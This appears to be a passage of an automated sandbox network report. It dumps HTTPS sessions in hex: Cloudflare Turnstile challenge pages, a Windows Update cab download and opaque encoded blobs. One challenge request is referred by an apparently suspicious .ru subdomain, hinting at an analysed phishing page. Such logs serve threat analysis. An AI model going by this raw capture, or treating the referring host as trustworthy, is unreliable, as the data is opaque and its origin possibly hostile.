                                                                              2024-10-03 01:14:02 UTC1369INData Raw: 78 37 6a 4d 36 37 66 49 30 63 75 33 77 4f 6e 43 37 4e 50 67 31 4e 2f 53 31 4d 48 58 37 4e 6a 33 34 68 48 77 38 65 58 54 42 76 4d 56 47 41 55 52 38 2f 54 6e 48 2b 66 7a 44 77 48 68 42 43 51 69 4a 53 6f 56 49 66 76 73 41 53 44 72 2f 41 59 41 36 2f 51 65 39 68 4d 46 38 76 41 72 39 53 77 2b 44 42 59 5a 44 54 38 7a 4d 79 55 39 4a 6b 6b 49 4b 77 73 4b 4f 45 70 45 54 51 74 54 54 43 34 51 52 30 4e 46 56 68 63 79 57 46 51 59 4e 56 59 5a 55 7a 63 35 51 6a 67 35 49 53 56 4d 52 46 5a 71 57 6a 42 64 4b 6d 59 2f 53 55 42 72 4d 56 5a 7a 4e 58 64 71 4f 57 6b 36 53 31 52 4f 57 48 78 58 68 55 6c 7a 68 6e 6c 61 52 30 56 78 53 6f 43 43 63 47 68 6c 69 57 43 43 65 48 70 55 6c 46 5a 7a 66 34 70 55 63 6f 78 77 63 6e 39 66 61 48 78 6b 64 57 32 57 62 35 32 41 6e 6e 4f 45 68 57 79
                                                                              Data Ascii: x7jM67fI0cu3wOnC7NPg1N/S1MHX7Nj34hHw8eXTBvMVGAUR8/TnH+fzDwHhBCQiJSoVIfvsASDr/AYA6/Qe9hMF8vAr9Sw+DBYZDT8zMyU9JkkIKwsKOEpETQtTTC4QR0NFVhcyWFQYNVYZUzc5Qjg5ISVMRFZqWjBdKmY/SUBrMVZzNXdqOWk6S1ROWHxXhUlzhnlaR0VxSoCCcGhliWCCeHpUlFZzf4pUcoxwcn9faHxkdW2Wb52AnnOEhWy
                                                                              2024-10-03 01:14:02 UTC1369INData Raw: 4f 69 35 36 73 76 55 33 76 65 33 41 2b 2b 36 42 73 4d 4e 78 63 50 4e 79 66 41 4e 34 67 6a 2b 43 4e 62 4e 43 52 76 32 31 51 66 6e 38 50 6f 55 30 78 38 4e 37 43 4c 66 4b 65 48 66 4a 65 55 4e 4b 79 67 64 2f 43 77 46 4c 52 33 77 4d 65 38 4f 38 77 4d 73 4c 2f 6b 73 4f 54 55 2b 50 44 39 45 42 6a 55 43 41 55 73 7a 4f 54 78 46 52 51 30 2b 52 55 6c 49 51 30 67 54 4e 6a 63 53 4d 44 4a 4d 54 31 59 53 50 31 4a 4c 4c 6b 42 5a 53 46 45 39 57 79 74 47 56 69 55 73 50 6b 64 6e 4c 31 78 47 62 45 68 4f 56 6d 31 31 66 47 55 32 55 55 74 68 64 33 35 61 64 48 74 39 68 48 47 4c 58 45 61 43 52 6d 52 4f 66 6b 78 54 69 59 4a 4f 6b 32 4f 4c 6d 35 4e 6e 65 46 57 4b 65 6f 32 6a 6e 6d 4b 53 59 47 65 64 6c 6d 46 64 65 70 57 66 62 48 71 65 70 71 71 64 6b 61 79 4e 6f 61 31 7a 65 33 71 62
                                                                              Data Ascii: Oi56svU3ve3A++6BsMNxcPNyfAN4gj+CNbNCRv21Qfn8PoU0x8N7CLfKeHfJeUNKygd/CwFLR3wMe8O8wMsL/ksOTU+PD9EBjUCAUszOTxFRQ0+RUlIQ0gTNjcSMDJMT1YSP1JLLkBZSFE9WytGViUsPkdnL1xGbEhOVm11fGU2UUthd35adHt9hHGLXEaCRmROfkxTiYJOk2OLm5NneFWKeo2jnmKSYGedlmFdepWfbHqepqqdkayNoa1ze3qb
                                                                              2024-10-03 01:14:02 UTC1369INData Raw: 54 41 78 73 58 78 78 4c 7a 6d 39 38 62 4f 7a 66 48 4b 35 78 45 43 7a 2b 7a 79 43 74 4d 47 48 51 37 59 33 68 55 42 32 68 2f 75 45 74 34 53 35 51 72 6a 36 75 55 62 36 51 51 68 47 65 30 49 37 52 2f 76 49 76 55 61 38 6a 59 31 4a 76 59 55 4e 53 33 36 50 77 38 6d 41 68 78 46 4d 77 59 67 54 53 30 48 4f 6b 30 37 44 41 55 72 52 78 45 73 57 55 49 54 4d 42 70 48 47 45 70 5a 53 52 77 6a 58 56 41 69 50 46 6c 53 4a 55 42 6c 57 53 70 46 53 31 6f 74 4a 55 39 67 4c 30 78 31 61 6a 4e 32 4d 6d 63 34 61 31 74 69 50 6c 6c 66 5a 54 2b 43 68 58 56 44 68 6f 31 34 53 6d 53 4a 65 30 79 4f 68 58 31 51 6b 70 57 48 56 6e 46 33 6a 31 64 66 6f 59 4a 62 65 4a 6d 4e 59 58 32 44 6b 57 4f 6d 70 5a 70 71 68 4c 47 52 61 35 2b 50 6c 6e 42 33 72 61 70 30 6b 59 65 6e 64 33 2b 78 72 33 79 59 76
                                                                              Data Ascii: TAxsXxxLzm98bOzfHK5xECz+zyCtMGHQ7Y3hUB2h/uEt4S5Qrj6uUb6QQhGe0I7R/vIvUa8jY1JvYUNS36Pw8mAhxFMwYgTS0HOk07DAUrRxEsWUITMBpHGEpZSRwjXVAiPFlSJUBlWSpFS1otJU9gL0x1ajN2Mmc4a1tiPllfZT+ChXVDho14SmSJe0yOhX1QkpWHVnF3j1dfoYJbeJmNYX2DkWOmpZpqhLGRa5+PlnB3rap0kYend3+xr3yYv
                                                                              2024-10-03 01:14:02 UTC1369INData Raw: 4a 34 38 62 35 43 66 41 49 44 65 4c 77 44 74 62 6d 42 64 54 77 42 52 48 59 33 67 6b 43 32 77 38 56 47 2b 44 37 2f 67 4c 69 36 75 48 37 36 65 73 74 49 43 4d 71 45 68 33 74 43 65 30 75 38 78 45 4b 4f 76 6f 52 45 78 38 32 45 2f 55 6a 4e 79 38 53 4a 51 55 7a 41 69 59 4b 44 30 30 39 43 52 41 69 51 55 59 54 55 53 31 54 52 30 68 55 58 45 70 68 4d 42 73 32 50 31 70 65 55 54 64 53 61 53 74 63 62 69 6f 73 5a 54 6f 72 62 57 46 56 63 48 4e 6b 63 48 68 6d 63 55 77 33 55 6b 39 32 65 6d 31 54 63 34 56 48 65 45 52 47 53 49 46 57 53 45 35 39 63 59 31 46 67 49 79 55 67 6c 5a 6f 55 32 36 46 6b 70 61 4a 62 34 79 68 56 58 4a 37 6d 59 69 68 68 61 4f 6e 6d 5a 64 70 6d 6d 36 66 62 71 74 79 70 4b 2b 79 68 35 4a 78 65 49 71 70 72 6e 75 35 6c 62 32 76 73 4d 47 42 71 4a 36 66 67 71
                                                                              Data Ascii: J48b5CfAIDeLwDtbmBdTwBRHY3gkC2w8VG+D7/gLi6uH76estICMqEh3tCe0u8xEKOvoREx82E/UjNy8SJQUzAiYKD009CRAiQUYTUS1TR0hUXEphMBs2P1peUTdSaStcbiosZTorbWFVcHNkcHhmcUw3Uk92em1Tc4VHeERGSIFWSE59cY1FgIyUglZoU26FkpaJb4yhVXJ7mYihhaOnmZdpmm6fbqtypK+yh5JxeIqprnu5lb2vsMGBqJ6fgq


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.449786104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:14:03 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1195242463:1727915362:58hzP5tn3icoVJf6EYrrU2uDT5trH6Au5dft6Khkcu4/8cc91295984a41f3/d43438995eb8455 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:14:03 UTC349INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 03 Oct 2024 01:14:03 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cf-chl-out: pVZSX2bsHuAqCb7Rvafvvbg5LL8GF26UAXw=$CjRseJobGfiMXq5t
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912ba1dafc3ff-EWR
                                                                              2024-10-03 01:14:03 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.4497934.175.87.197443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:14:17 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Xc14Vl+MOHmbebK&MD=R+GozY2U HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-10-03 01:14:18 UTC560INHTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                              MS-CorrelationId: 2570b88c-f9a0-45e2-9465-a1a2ec6dffbd
                                                                              MS-RequestId: e239ff78-efde-4710-abc3-6e8ccfc7b831
                                                                              MS-CV: EqO6xnh1SUqQCLie.0
                                                                              X-Microsoft-SLSClientCache: 1440
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Thu, 03 Oct 2024 01:14:17 GMT
                                                                              Connection: close
                                                                              Content-Length: 30005
                                                                              2024-10-03 01:14:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                              2024-10-03 01:14:18 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.449798104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:03 UTC800OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: iframe
                                                                              Referer: https://ge6j.sisbousim.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:03 UTC1369INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:16:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 164872
                                                                              Connection: close
                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                              origin-agent-cluster: ?1
                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              document-policy: js-profiling
                                                                              referrer-policy: same-origin
                                                                              cross-origin-resource-policy: cross-origin
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cross-origin-opener-policy: same-origin
                                                                              cross-origin-embedder-policy: require-corp
                                                                              2024-10-03 01:16:03 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 39 31 35 61 37 66 63 39 31 63 34 30 37 2d 45 57 52 0d 0a 0d 0a
                                                                              Data Ascii: Server: cloudflareCF-RAY: 8cc915a7fc91c407-EWR
                                                                              2024-10-03 01:16:03 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                              Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                              Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                              Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                              Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                              Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                              Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                              Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                              2024-10-03 01:16:03 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
